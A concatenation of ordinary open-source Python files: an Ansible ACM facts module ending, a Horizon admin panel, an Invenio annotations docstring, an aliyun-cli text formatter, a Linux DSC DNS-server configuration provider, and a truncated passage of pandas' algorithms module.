    module = AnsibleModule(argument_spec=argument_spec, supports_check_mode=True)
    if not HAS_BOTO3:
        module.fail_json('boto3 and botocore are required by this module')

    # Build an ACM client from the standard AWS connection parameters.
    try:
        region, ec2_url, aws_connect_kwargs = get_aws_connection_info(module, boto3=True)
        client = boto3_conn(module, conn_type='client', resource='acm',
                            region=region, endpoint=ec2_url, **aws_connect_kwargs)
    except (botocore.exceptions.NoCredentialsError,
            botocore.exceptions.ProfileNotFound) as e:
        module.fail_json(msg="Can't authorize connection - " + str(e))

    certificates = get_certificates(client, module,
                                    name=module.params['name'],
                                    statuses=module.params['statuses'])
    module.exit_json(certificates=certificates)


if __name__ == '__main__':
    main()
| gpl-3.0 |
Solinea/horizon | openstack_dashboard/dashboards/admin/metadata_defs/panel.py | 30 | 1055 | #
# (c) Copyright 2014 Hewlett-Packard Development Company, L.P.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from django.utils.translation import ugettext_lazy as _
import horizon
from openstack_dashboard.api import glance
from openstack_dashboard.dashboards.admin import dashboard
class MetadataDefinitions(horizon.Panel):
    """Admin dashboard panel for Glance metadata definitions (admin-only)."""
    name = _("Metadata Definitions")
    slug = 'metadata_defs'
    permissions = ('openstack.roles.admin',)


# The metadata-definitions catalog only exists in the Glance v2 API.
if glance.VERSIONS.active >= 2:
    dashboard.Admin.register(MetadataDefinitions)
| apache-2.0 |
egabancho/invenio | invenio/modules/annotations/__init__.py | 2 | 1656 | # -*- coding: utf-8 -*-
##
## This file is part of Invenio.
## Copyright (C) 2014 CERN.
##
## Invenio is free software; you can redistribute it and/or
## modify it under the terms of the GNU General Public License as
## published by the Free Software Foundation; either version 2 of the
## License, or (at your option) any later version.
##
## Invenio is distributed in the hope that it will be useful, but
## WITHOUT ANY WARRANTY; without even the implied warranty of
## MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
## General Public License for more details.
##
## You should have received a copy of the GNU General Public License
## along with Invenio; if not, write to the Free Software Foundation, Inc.,
## 59 Temple Place, Suite 330, Boston, MA 02111-1307, USA.
"""
Annotations.
invenio.modules.annotations
---------------------------
**FIXME: Outdated documentation.**
To enable the module, make sure to remove it from ``PACKAGES_EXCLUDE``,
where it is placed by default.
To enable Web page annotations, add the following to your templates:
.. code-block:: jinja
{%- from "annotations/macros.html" import annotations_toolbar -%}
{%- block global_bundles -%}
{{ super() }}
{% bundle "30-annotations.js", "30-annotations.css" %}
{%- endblock global_bundles -%}
{%- block page_body -%}
{{ annotations_toolbar() }}
{{ super() }}
{%- endblock page_body -%}
To enable document annotations, along with the previewer, set the following
configuration variables to ``True``:
.. code-block:: python
ANNOTATIONS_NOTES_ENABLED = True
ANNOTATIONS_PREVIEW_ENABLED = True
"""
| gpl-2.0 |
blademainer/aliyun-cli | aliyuncli/text.py | 11 | 4478 | '''
Licensed to the Apache Software Foundation (ASF) under one
or more contributor license agreements. See the NOTICE file
distributed with this work for additional information
regarding copyright ownership. The ASF licenses this file
to you under the Apache License, Version 2.0 (the
"License"); you may not use this file except in compliance
with the License. You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing,
software distributed under the License is distributed on an
"AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
KIND, either express or implied. See the License for the
specific language governing permissions and limitations
under the License.
'''
import six
def format_text(data, stream):
    """Render *data* (scalar, list or dict) as tab-separated text on *stream*."""
    _format_text(data, stream)
def _format_text(item, stream, identifier=None, scalar_keys=None):
    # Dispatch on container type; scalars are written directly.
    if isinstance(item, dict):
        _format_dict(scalar_keys, item, identifier, stream)
    elif isinstance(item, list):
        _format_list(item, identifier, stream)
    else:
        # If it's not a list or a dict, we just write the scalar
        # value out directly.
        stream.write(six.text_type(item))
        stream.write('\n')
def _format_list(item, identifier, stream):
    """Format a list, branching on whether it holds dicts, sublists or scalars."""
    if not item:
        return
    if any(isinstance(el, dict) for el in item):
        # Dicts in the list: compute the union of scalar keys up front so
        # every row is printed with the same columns.
        all_keys = _all_scalar_keys(item)
        for element in item:
            _format_text(element, stream=stream, identifier=identifier,
                         scalar_keys=all_keys)
    elif any(isinstance(el, list) for el in item):
        # Mixed scalars and sublists: print scalars first, then recurse
        # into each nested container.
        scalar_elements, non_scalars = _partition_list(item)
        if scalar_elements:
            _format_scalar_list(scalar_elements, identifier, stream)
        for non_scalar in non_scalars:
            _format_text(non_scalar, stream=stream,
                         identifier=identifier)
    else:
        _format_scalar_list(item, identifier, stream)
def _partition_list(item):
scalars = []
non_scalars = []
for element in item:
if isinstance(element, (list, dict)):
non_scalars.append(element)
else:
scalars.append(element)
return scalars, non_scalars
def _format_scalar_list(elements, identifier, stream):
if identifier is not None:
for item in elements:
stream.write('%s\t%s\n' % (identifier.upper(),
item))
else:
# For a bare list, just print the contents.
stream.write('\t'.join([six.text_type(item) for item in elements]))
stream.write('\n')
def _format_dict(scalar_keys, item, identifier, stream):
    """Write a dict: scalar values as one tab-separated row (prefixed by the
    identifier, if any), then recurse into nested containers keyed by name."""
    scalars, non_scalars = _partition_dict(item, scalar_keys=scalar_keys)
    if scalars:
        if identifier is not None:
            scalars.insert(0, identifier.upper())
        stream.write('\t'.join(scalars))
        stream.write('\n')
    for new_identifier, non_scalar in non_scalars:
        # The dict key becomes the identifier for the nested structure.
        _format_text(item=non_scalar, stream=stream,
                     identifier=new_identifier)
def _all_scalar_keys(list_of_dicts):
keys_seen = set()
for item_dict in list_of_dicts:
for key, value in item_dict.items():
if not isinstance(value, (dict, list)):
keys_seen.add(key)
return list(sorted(keys_seen))
def _partition_dict(item_dict, scalar_keys):
# Given a dictionary, partition it into two list based on the
# values associated with the keys.
# {'foo': 'scalar', 'bar': 'scalar', 'baz': ['not, 'scalar']}
# scalar = [('foo', 'scalar'), ('bar', 'scalar')]
# non_scalar = [('baz', ['not', 'scalar'])]
scalar = []
non_scalar = []
if scalar_keys is None:
# scalar_keys can have more than just the keys in the item_dict,
# but if user does not provide scalar_keys, we'll grab the keys
# from the current item_dict
for key, value in sorted(item_dict.items()):
if isinstance(value, (dict, list)):
non_scalar.append((key, value))
else:
scalar.append(six.text_type(value))
else:
for key in scalar_keys:
scalar.append(six.text_type(item_dict.get(key, '')))
remaining_keys = sorted(set(item_dict.keys()) - set(scalar_keys))
for remaining_key in remaining_keys:
non_scalar.append((remaining_key, item_dict[remaining_key]))
return scalar, non_scalar
| apache-2.0 |
MSFTOSSMgmt/WPSDSCLinux | Providers/Scripts/3.x/Scripts/nxDNSServerAddress.py | 2 | 10601 | #!/usr/bin/env python
#============================================================================
# Copyright (c) Microsoft Corporation. All rights reserved. See license.txt for license information.
#============================================================================
import os
import sys
import tempfile
import re
import platform
import imp
import socket
protocol=imp.load_source('protocol','../protocol.py')
"""
Ubuntu/Debian: /etc/network/interfaces:dns-nameservers 8.8.8.8 8.8.4.4
REDHAT/CENTOS: /etc/resolv.conf
nameserver 192.168.1.254
nameserver 8.8.8.8
SLES: /etc/sysconfig/network/config:NETCONFIG_DNS_STATIC_SEARCHLIST="<ipaddr1> <ipaddr2>"
[ClassVersion("1.0.0"), FriendlyName("nxDNSServerAddress")]
class MSFT_nxDNSServerAddressResource : OMI_BaseResource
{
[Key] string Address[];
[Write,ValueMap{"Ensure"},Values{"Present", "Absent"}] string Ensure;
[Write,ValueMap{"IPv4", "IPv6"},Values{"IPv4", "IPv6"}] string AddressFamily;
};
"""
def ValidateAddresses(Address, AddressFamily):
    """Validate a list of DNS server addresses.

    Parameters
    ----------
    Address : list of str
        Candidate server addresses; at most three entries are allowed.
    AddressFamily : str
        'IPv4' or 'IPv6' (substring match, mirroring the MOF schema values).

    Returns
    -------
    bool
        True when every address parses for the requested family,
        False otherwise.
    """
    if len(Address) > 3:
        # Bug fix: the original called print(msg, sys.stderr), which printed
        # the stream object to stdout; file= routes the message to stderr.
        print("ERROR: Maximum of three entries for Address", file=sys.stderr)
        return False
    if 'IPv4' in AddressFamily:
        ptype = socket.AF_INET
    elif 'IPv6' in AddressFamily:
        ptype = socket.AF_INET6
    else:
        # Unknown address family.
        return False
    for a in Address:
        try:
            socket.inet_pton(ptype, a)
        except (OSError, ValueError):
            # socket.error is an alias of OSError on Python 3; ValueError
            # covers malformed input.  Narrowed from the original bare except.
            return False
    return True
def Set_Marshall(Address,Ensure,AddressFamily):
    """DSC 'Set': apply the requested DNS server configuration.

    Returns [0] on success, [-1] on failure (DSC provider convention).
    """
    # Default the optional properties, mirroring the MOF defaults.
    if Ensure == None or len(Ensure)<1:
        Ensure='Present'
    if AddressFamily == None or len(AddressFamily)<1:
        AddressFamily='IPv4'
    if ValidateAddresses(Address,AddressFamily) == False:
        return [-1]
    MyDistro=GetMyDistro()
    retval = MyDistro.Set(Address,Ensure,AddressFamily)
    return retval
def Test_Marshall(Address,Ensure,AddressFamily):
    """DSC 'Test': report whether the system already matches the request.

    Returns [0] when compliant, [-1] otherwise.
    """
    # Default the optional properties, mirroring the MOF defaults.
    if Ensure == None or len(Ensure)<1:
        Ensure='Present'
    if AddressFamily == None or len(AddressFamily)<1:
        AddressFamily='IPv4'
    if ValidateAddresses(Address,AddressFamily) == False:
        return [-1]
    MyDistro=GetMyDistro()
    retval= MyDistro.Test(Address,Ensure,AddressFamily)
    return retval
def Get_Marshall(Address,Ensure,AddressFamily):
    """DSC 'Get': read back the current DNS configuration.

    Returns (exit_code, dict) where the dict maps this function's own
    argument names to protocol-wrapped MI values.
    """
    # Capture this function's argument names before any other locals are
    # created; they key the returned property dictionary below.
    arg_names=list(locals().keys())
    if Ensure == None or len(Ensure)<1:
        Ensure='Present'
    if AddressFamily == None or len(AddressFamily)<1:
        AddressFamily='IPv4'
    if ValidateAddresses(Address,AddressFamily) == False:
        return [-1,Address,Ensure,AddressFamily]
    retval = 0
    MyDistro=GetMyDistro()
    (retval, Address) = MyDistro.Get(Address,Ensure,AddressFamily)
    # Wrap the results in MI protocol types for the OMI provider layer.
    Ensure = protocol.MI_String(Ensure.encode("utf-8"))
    Address = protocol.MI_StringA(Address)
    AddressFamily= protocol.MI_String(AddressFamily.encode("utf-8"))
    retd={}
    ld=locals()
    for k in arg_names :
        retd[k]=ld[k]
    return retval, retd
def FindStringInFile(fname, matchs, multiline=False):
    """
    Single line: return match object if found in file.
    Multi line: return list of matches found in file.
    """
    print("%s %s %s" % (fname, matchs, multiline), file=sys.stderr)
    found = None
    if multiline:
        # Whole-file search: DOTALL + MULTILINE, returning every match.
        pattern = re.compile(matchs, re.S | re.M)
        with open(fname, 'r') as fh:
            found = re.findall(pattern, fh.read())
    else:
        # Line-by-line search: stop at the first matching line.
        pattern = re.compile(matchs)
        with open(fname, 'r') as fh:
            for line in fh.readlines():
                found = re.search(pattern, line)
                if found:
                    break
    return found
def ReplaceStringInFile(fname,src,repl):
    """
    Replace 'src' with 'repl' in file.
    Returns True when 'src' was found and the file was rewritten,
    False when the pattern did not occur.
    """
    updated=''
    try:
        sr=re.compile(src)
        if FindStringInFile(fname,src):
            for l in (open(fname,'r')).readlines():
                n=re.sub(sr,repl,l)
                # NOTE(review): lines shorter than 3 characters after the
                # substitution are dropped entirely -- presumably to discard
                # lines the replacement emptied out; confirm intent before
                # changing.
                if len(n)>2:
                    updated+=n
            ReplaceFileContentsAtomic(fname,updated)
            return True
    except :
        raise
    return False
def AppendStringToFile(fname, s):
    """Append *s* to file *fname*, ensuring the written data ends in a newline.

    Parameters
    ----------
    fname : str
        Path of the file to append to (created if missing).
    s : str
        Text to append; a trailing newline is added when absent.

    Returns
    -------
    bool
        Always True (kept for backward compatibility with callers).
    """
    with open(fname, 'a') as F:
        F.write(s)
        # Bug fix: the original indexed s[-1], which raised IndexError for
        # an empty string; the guarded endswith check is safe for any input.
        if s and not s.endswith('\n'):
            F.write('\n')
    # The explicit F.close() of the original was redundant inside 'with'.
    return True
def ReplaceFileContentsAtomic(filepath, contents):
    """
    Write 'contents' to 'filepath' by creating a temp file, and replacing original.

    NOTE(review): the return value is inconsistent -- None on success AND on
    the initial write failure, 1 when the final rename retry fails, 0 after
    the rename-failure recovery path; callers should not rely on it.
    """
    # Create the temp file in the same directory so os.rename stays on a
    # single filesystem (cross-device rename would fail).
    handle, temp = tempfile.mkstemp(dir = os.path.dirname(filepath))
    if type(contents) == str :
        contents=contents.encode('latin-1')
    try:
        os.write(handle, contents)
    except IOError as e:
        print('ReplaceFileContentsAtomic','Writing to file ' + filepath + ' Exception is ' + str(e),file=sys.stderr)
        # NOTE(review): the temp file is leaked on this path.
        return None
    finally:
        os.close(handle)
    try:
        # Atomic swap: rename the fully-written temp file over the original.
        os.rename(temp, filepath)
        return None
    except IOError as e:
        print('ReplaceFileContentsAtomic','Renaming ' + temp+ ' to ' + filepath + ' Exception is ' +str(e),file=sys.stderr)
        # Fallback: remove the destination and retry the rename once.
        try:
            os.remove(filepath)
        except IOError as e:
            print('ReplaceFileContentsAtomic','Removing '+ filepath + ' Exception is ' +str(e),file=sys.stderr)
        try:
            os.rename(temp,filepath)
        except IOError as e:
            print('ReplaceFileContentsAtomic','Removing '+ filepath + ' Exception is ' +str(e),file=sys.stderr)
            return 1
    return 0
def GetMyDistro(dist_class_name=''):
    """
    Return MyDistro object.

    Looks up '<Distro>Distro' among this module's globals and instantiates
    it; returns None (after printing) for unsupported distributions.
    """
    if dist_class_name == '':
        if 'Linux' in platform.system():
            # NOTE(review): platform.dist() was removed in Python 3.8; this
            # presumably targets older interpreters -- confirm before use.
            Distro=platform.dist()[0]
        else : # I know this is not Linux!
            if 'FreeBSD' in platform.system():
                Distro=platform.system()
        Distro=Distro.strip('"')
        Distro=Distro.strip(' ')
        dist_class_name=Distro+'Distro'
    else:
        Distro=dist_class_name
    if not dist_class_name in globals().keys():
        print(Distro+' is not a supported distribution.')
        return None
    return globals()[dist_class_name]() # the distro class inside this module.
class AbstractDistro(object):
    """Base distro handler for nameserver entries in a DNS config file.

    Subclasses override ``file`` (config path), ``dns_srch`` (the line
    prefix that introduces nameservers) and ``mode``:
    'single' = all addresses on one line, 'multi' = one line per address,
    'single-quoted' = one quoted, space-separated list value.
    """
    def __init__(self):
        # Defaults match resolv.conf-style configuration.
        self.file='/etc/resolv.conf'
        self.dns_srch='nameserver '
        self.mode='single'
    def get_addrs(self,addrs,mode):
        """Return configured addresses; all of them when 'addrs' is empty,
        otherwise only those from 'addrs' that are present in the file."""
        line_list=FindStringInFile(self.file,'('+self.dns_srch+'.*?$)',True) # use multiline
        naddrs=[]
        if len(addrs) == 0:
            # Collect every address on every matching line.
            for l in line_list:
                l=l.replace(self.dns_srch,'')
                l = l.strip('"')
                l = l.strip("'")
                l = l.strip('\n')
                for a in l.split():
                    naddrs.append(a)
            return naddrs
        # Subset check: keep only requested addresses found in the file.
        for a in addrs:
            for l in line_list:
                if a in l:
                    naddrs.append(a)
        return naddrs
    def add_addrs(self,addrs,mode):
        """Rewrite the config so it contains exactly 'addrs'."""
        # - TODO EXECPTION handlers
        delim=''
        if 'quoted' in mode:
            delim='"'
        if 'multi' in mode:
            # One line per address: clear existing lines, then append each.
            ReplaceStringInFile(self.file,'('+self.dns_srch+'.*)','')
            for a in addrs:
                AppendStringToFile(self.file,self.dns_srch+' '+a)
        elif 'single' in mode:
            # Single line: reset it to the prefix, then write the full list.
            ReplaceStringInFile(self.file,'('+self.dns_srch+'.*)',self.dns_srch+delim)
            l=self.dns_srch
            for a in addrs:
                l+=a
                l+=' '
            if len(FindStringInFile(self.file,'('+self.dns_srch+'.*)',True)) == 0:
                AppendStringToFile(self.file,l)
            else:
                ReplaceStringInFile(self.file,self.dns_srch,l)
        return True
    def del_addrs(self,addrs,mode):
        """Remove 'addrs' from the config, keeping all other addresses."""
        delim=''
        cur_addrs = self.get_addrs('',self.mode)
        new_addrs = []
        for c in cur_addrs:
            if c not in addrs:
                new_addrs.append(c)
        if mode == 'multi':
            ReplaceStringInFile(self.file,self.dns_srch+'.*','')
            for a in new_addrs:
                AppendStringToFile(self.file,self.dns_srch+' '+a)
        elif 'single' in mode:
            if 'quoted' in mode:
                delim='"'
            if len(new_addrs):
                l=self.dns_srch
                for a in new_addrs:
                    l+=a
                    l+=' '
                l+=delim
            else:
                l=''
            ReplaceStringInFile(self.file,self.dns_srch+'.*',l)
        return True
    def Set(self,addrs,Ensure,AddressFamily):
        """Apply the desired state; [0] on success, [-1] on failure."""
        retval=[-1]
        r=False
        if Ensure=='Absent':
            r=self.del_addrs(addrs,self.mode)
        else:
            r=self.add_addrs(addrs,self.mode)
        if r:
            retval=[0]
        return retval
    def Test(self,addrs,Ensure,AddressFamily):
        """[0] when every requested address is present, [-1] otherwise."""
        if len(self.get_addrs(addrs,self.mode)) != len(addrs):
            return [-1]
        return [0]
    def Get(self,addrs,Ensure,AddressFamily):
        """Return (0, current addresses)."""
        new_addrs=self.get_addrs(addrs,self.mode)
        if len(new_addrs) == 0:
            # NOTE(review): 'Ensure == ...' is a comparison, not an
            # assignment, so it has no effect -- '=' was likely intended.
            Ensure == 'Absent'
            new_addrs=addrs
        else:
            Ensure == 'Present'
        return 0,new_addrs
class SuSEDistro(AbstractDistro):
    """SLES: quoted list in NETCONFIG_DNS_STATIC_SEARCHLIST of network config."""
    def __init__(self):
        super(SuSEDistro,self).__init__()
        self.file='/etc/sysconfig/network/config'
        self.dns_srch='NETCONFIG_DNS_STATIC_SEARCHLIST="'
        self.mode='single-quoted'
    def Set(self,addrs,Ensure,AddressFamily):
        # Delegates to the base implementation; kept as an explicit hook.
        return super(SuSEDistro,self).Set(addrs,Ensure,AddressFamily)
class debianDistro(AbstractDistro):
    """Debian family: 'dns-nameservers' line in /etc/network/interfaces."""
    def __init__(self):
        super(debianDistro,self).__init__()
        self.file='/etc/network/interfaces'
        self.dns_srch='dns-nameservers '
class redhatDistro(AbstractDistro):
    """Red Hat family: one 'nameserver' line per server in /etc/resolv.conf."""
    def __init__(self):
        super(redhatDistro,self).__init__()
        self.mode='multi'
    def Set(self,addrs,Ensure,AddressFamily):
        # Delegates to the base implementation; kept as an explicit hook.
        return super(redhatDistro,self).Set(addrs,Ensure,AddressFamily)
class UbuntuDistro(debianDistro):
    """Ubuntu behaves like Debian."""
    def __init__(self):
        super(UbuntuDistro,self).__init__()
class LinuxMintDistro(UbuntuDistro):
    """Linux Mint behaves like Ubuntu."""
    def __init__(self):
        super(LinuxMintDistro,self).__init__()
class fedoraDistro(redhatDistro):
    """Fedora behaves like Red Hat."""
    def __init__(self):
        super(fedoraDistro,self).__init__()
    def Set(self,addrs,Ensure,AddressFamily):
        return super(fedoraDistro,self).Set(addrs,Ensure,AddressFamily)
class centosDistro(redhatDistro):
    """CentOS behaves like Red Hat."""
    def __init__(self):
        super(centosDistro,self).__init__()
    def Set(self,addrs,Ensure,AddressFamily):
        return super(centosDistro,self).Set(addrs,Ensure,AddressFamily)
| mit |
DGrady/pandas | pandas/core/algorithms.py | 2 | 51643 | """
Generic data algorithms. This module is experimental at the moment and not
intended for public consumption
"""
from __future__ import division
from warnings import warn, catch_warnings
import numpy as np
from pandas import compat, _np_version_under1p8
from pandas.core.dtypes.cast import maybe_promote
from pandas.core.dtypes.generic import (
ABCSeries, ABCIndex,
ABCIndexClass, ABCCategorical)
from pandas.core.dtypes.common import (
is_unsigned_integer_dtype, is_signed_integer_dtype,
is_integer_dtype, is_complex_dtype,
is_object_dtype,
is_categorical_dtype, is_sparse,
is_period_dtype,
is_numeric_dtype, is_float_dtype,
is_bool_dtype, needs_i8_conversion,
is_categorical, is_datetimetz,
is_datetime64_any_dtype, is_datetime64tz_dtype,
is_timedelta64_dtype, is_interval_dtype,
is_scalar, is_list_like,
_ensure_platform_int, _ensure_object,
_ensure_float64, _ensure_uint64,
_ensure_int64)
from pandas.compat.numpy import _np_version_under1p10
from pandas.core.dtypes.missing import isna
from pandas.core import common as com
from pandas._libs import algos, lib, hashtable as htable
from pandas._libs.tslib import iNaT
# --------------- #
# dtype access #
# --------------- #
def _ensure_data(values, dtype=None):
    """
    routine to ensure that our data is of the correct
    input dtype for lower-level routines

    This will coerce:
    - ints -> int64
    - uint -> uint64
    - bool -> uint64 (TODO this should be uint8)
    - datetimelike -> i8
    - datetime64tz -> i8 (in local tz)
    - categorical -> codes

    Parameters
    ----------
    values : array-like
    dtype : pandas_dtype, optional
        coerce to this dtype

    Returns
    -------
    (ndarray, pandas_dtype, algo dtype as a string)
    """

    # we check some simple dtypes first
    try:
        if is_object_dtype(dtype):
            return _ensure_object(np.asarray(values)), 'object', 'object'
        if is_bool_dtype(values) or is_bool_dtype(dtype):
            # we are actually coercing to uint64
            # until our algos suppport uint8 directly (see TODO)
            return np.asarray(values).astype('uint64'), 'bool', 'uint64'
        elif is_signed_integer_dtype(values) or is_signed_integer_dtype(dtype):
            return _ensure_int64(values), 'int64', 'int64'
        elif (is_unsigned_integer_dtype(values) or
              is_unsigned_integer_dtype(dtype)):
            return _ensure_uint64(values), 'uint64', 'uint64'
        elif is_float_dtype(values) or is_float_dtype(dtype):
            return _ensure_float64(values), 'float64', 'float64'
        elif is_object_dtype(values) and dtype is None:
            return _ensure_object(np.asarray(values)), 'object', 'object'
        elif is_complex_dtype(values) or is_complex_dtype(dtype):
            # ignore the fact that we are casting to float
            # which discards complex parts
            with catch_warnings(record=True):
                values = _ensure_float64(values)
            return values, 'float64', 'float64'
    except (TypeError, ValueError):
        # if we are trying to coerce to a dtype
        # and it is incompat this will fall thru to here
        return _ensure_object(values), 'object', 'object'

    # datetimelike
    if (needs_i8_conversion(values) or
            is_period_dtype(dtype) or
            is_datetime64_any_dtype(dtype) or
            is_timedelta64_dtype(dtype)):
        if is_period_dtype(values) or is_period_dtype(dtype):
            from pandas import PeriodIndex
            values = PeriodIndex(values)
            dtype = values.dtype
        elif is_timedelta64_dtype(values) or is_timedelta64_dtype(dtype):
            from pandas import TimedeltaIndex
            values = TimedeltaIndex(values)
            dtype = values.dtype
        else:
            # Datetime
            from pandas import DatetimeIndex
            values = DatetimeIndex(values)
            dtype = values.dtype
        # datetimelike values are hashed/compared via their int64 view
        return values.asi8, dtype, 'int64'

    elif (is_categorical_dtype(values) and
          (is_categorical_dtype(dtype) or dtype is None)):
        values = getattr(values, 'values', values)
        values = values.codes
        dtype = 'category'
        # we are actually coercing to int64
        # until our algos suppport int* directly (not all do)
        values = _ensure_int64(values)
        return values, dtype, 'int64'

    # we have failed, return object
    values = np.asarray(values)
    return _ensure_object(values), 'object', 'object'
def _reconstruct_data(values, dtype, original):
    """
    reverse of _ensure_data

    Parameters
    ----------
    values : ndarray
    dtype : pandas_dtype
    original : ndarray-like

    Returns
    -------
    Index for extension types, otherwise ndarray casted to dtype
    """
    from pandas import Index
    if is_categorical_dtype(dtype):
        # categorical codes are reconstructed by the caller; nothing to do
        pass
    elif is_datetime64tz_dtype(dtype) or is_period_dtype(dtype):
        # rebuild the extension Index around the raw integer values
        values = Index(original)._shallow_copy(values, name=None)
    elif is_bool_dtype(dtype):
        values = values.astype(dtype)
        # we only support object dtypes bool Index
        if isinstance(original, Index):
            values = values.astype(object)
    elif dtype is not None:
        values = values.astype(dtype)
    return values
def _ensure_arraylike(values):
    """
    ensure that we are arraylike if not already
    """
    if not isinstance(values, (np.ndarray, ABCCategorical,
                               ABCIndexClass, ABCSeries)):
        # string-like / mixed sequences need an object array to avoid
        # numpy coercing them to fixed-width string dtypes
        inferred = lib.infer_dtype(values)
        if inferred in ['mixed', 'string', 'unicode']:
            if isinstance(values, tuple):
                values = list(values)
            values = lib.list_to_object_array(values)
        else:
            values = np.asarray(values)
    return values
# Map algo dtype string -> (hash table class, vector class) used by the
# hashtable-based algorithms below.
_hashtables = {
    'float64': (htable.Float64HashTable, htable.Float64Vector),
    'uint64': (htable.UInt64HashTable, htable.UInt64Vector),
    'int64': (htable.Int64HashTable, htable.Int64Vector),
    'string': (htable.StringHashTable, htable.ObjectVector),
    'object': (htable.PyObjectHashTable, htable.ObjectVector)
}
def _get_hashtable_algo(values):
    """
    Parameters
    ----------
    values : arraylike

    Returns
    -------
    tuples(hashtable class,
           vector class,
           values,
           dtype,
           ndtype)
    """
    values, dtype, ndtype = _ensure_data(values)
    if ndtype == 'object':
        # its cheaper to use a String Hash Table than Object
        if lib.infer_dtype(values) in ['string']:
            ndtype = 'string'
        else:
            ndtype = 'object'
    htable, table = _hashtables[ndtype]
    return (htable, table, values, dtype, ndtype)
def _get_data_algo(values, func_map):
    """
    Look up the implementation in ``func_map`` keyed by the ndtype of
    ``values``, falling back to the 'object' implementation.
    """
    if is_categorical_dtype(values):
        # rank categoricals on their internal ordering values
        values = values._values_for_rank()

    values, dtype, ndtype = _ensure_data(values)

    # its cheaper to use a String Hash Table than Object
    if ndtype == 'object' and lib.infer_dtype(values) in ['string']:
        ndtype = 'string'

    return func_map.get(ndtype, func_map['object']), values
# --------------- #
# top-level algos #
# --------------- #
def match(to_match, values, na_sentinel=-1):
    """
    Compute locations of to_match into values

    Parameters
    ----------
    to_match : array-like
        values to find positions of
    values : array-like
        Unique set of values
    na_sentinel : int, default -1
        Value to mark "not found"

    Examples
    --------

    Returns
    -------
    match : ndarray of integers
    """
    values = com._asarray_tuplesafe(values)
    # resolve the hashtable class matching the dtype of `values`
    htable, _, values, dtype, ndtype = _get_hashtable_algo(values)
    # coerce `to_match` to the same internal representation so that
    # lookups against the table compare equal
    to_match, _, _ = _ensure_data(to_match, dtype)
    # cap the pre-sized table; it grows on demand past this
    table = htable(min(len(to_match), 1000000))
    table.map_locations(values)
    # lookup() marks entries of `to_match` not found in `values` with -1
    result = table.lookup(to_match)
    if na_sentinel != -1:
        # replace but return a numpy array
        # use a Series because it handles dtype conversions properly
        from pandas import Series
        result = Series(result.ravel()).replace(-1, na_sentinel).values.\
            reshape(result.shape)
    return result
def unique(values):
    """
    Hash table-based unique. Uniques are returned in order
    of appearance. This does NOT sort.

    Significantly faster than numpy.unique. Includes NA values.

    Parameters
    ----------
    values : 1d array-like

    Returns
    -------
    unique values.
      - If the input is an Index, the return is an Index
      - If the input is a Categorical dtype, the return is a Categorical
      - If the input is a Series/ndarray, the return will be an ndarray

    Examples
    --------
    >>> pd.unique(pd.Series([2, 1, 3, 3]))
    array([2, 1, 3])

    >>> pd.unique(pd.Series([2] + [1] * 5))
    array([2, 1])

    >>> pd.unique(Series([pd.Timestamp('20160101'),
    ...                   pd.Timestamp('20160101')]))
    array(['2016-01-01T00:00:00.000000000'], dtype='datetime64[ns]')

    >>> pd.unique(pd.Series([pd.Timestamp('20160101', tz='US/Eastern'),
    ...                      pd.Timestamp('20160101', tz='US/Eastern')]))
    array([Timestamp('2016-01-01 00:00:00-0500', tz='US/Eastern')],
          dtype=object)

    >>> pd.unique(pd.Index([pd.Timestamp('20160101', tz='US/Eastern'),
    ...                     pd.Timestamp('20160101', tz='US/Eastern')]))
    DatetimeIndex(['2016-01-01 00:00:00-05:00'],
    ...           dtype='datetime64[ns, US/Eastern]', freq=None)

    >>> pd.unique(list('baabc'))
    array(['b', 'a', 'c'], dtype=object)

    An unordered Categorical will return categories in the
    order of appearance.

    >>> pd.unique(Series(pd.Categorical(list('baabc'))))
    [b, a, c]
    Categories (3, object): [b, a, c]

    >>> pd.unique(Series(pd.Categorical(list('baabc'),
    ...                                 categories=list('abc'))))
    [b, a, c]
    Categories (3, object): [b, a, c]

    An ordered Categorical preserves the category ordering.

    >>> pd.unique(Series(pd.Categorical(list('baabc'),
    ...                                 categories=list('abc'),
    ...                                 ordered=True)))
    [b, a, c]
    Categories (3, object): [a < b < c]

    An array of tuples

    >>> pd.unique([('a', 'b'), ('b', 'a'), ('a', 'c'), ('b', 'a')])
    array([('a', 'b'), ('b', 'a'), ('a', 'c')], dtype=object)

    See Also
    --------
    pandas.Index.unique
    pandas.Series.unique
    """
    values = _ensure_arraylike(values)

    # categorical is a fast-path
    # this will coerce Categorical, CategoricalIndex,
    # and category dtypes Series to same return of Category
    if is_categorical_dtype(values):
        # NOTE: this previously did ``getattr(values, '.values', values)``,
        # which was a no-op: '.values' (with a leading dot) is never a valid
        # attribute name, so the default was always returned. Categorical,
        # CategoricalIndex and category-dtype Series all implement
        # .unique() directly, so we dispatch to it unchanged.
        return values.unique()

    original = values
    htable, _, values, dtype, ndtype = _get_hashtable_algo(values)

    table = htable(len(values))
    uniques = table.unique(values)
    uniques = _reconstruct_data(uniques, dtype, original)

    if isinstance(original, ABCSeries) and is_datetime64tz_dtype(dtype):
        # we are special casing datetime64tz_dtype
        # to return an object array of tz-aware Timestamps
        # TODO: it must return DatetimeArray with tz in pandas 2.0
        uniques = uniques.asobject.values

    return uniques


unique1d = unique
def isin(comps, values):
    """
    Compute the isin boolean array

    Parameters
    ----------
    comps: array-like
    values: array-like

    Returns
    -------
    boolean array same length as comps
    """
    if not is_list_like(comps):
        raise TypeError("only list-like objects are allowed to be passed"
                        " to isin(), you passed a "
                        "[{0}]".format(type(comps).__name__))
    if not is_list_like(values):
        raise TypeError("only list-like objects are allowed to be passed"
                        " to isin(), you passed a "
                        "[{0}]".format(type(values).__name__))

    # materialize generic iterables (sets, generators, ...) as object arrays
    if not isinstance(values, (ABCIndex, ABCSeries, np.ndarray)):
        values = lib.list_to_object_array(list(values))

    # coerce both operands to the same internal representation so that
    # membership tests compare equal
    comps, dtype, _ = _ensure_data(comps)
    values, _, _ = _ensure_data(values, dtype=dtype)

    # GH11232
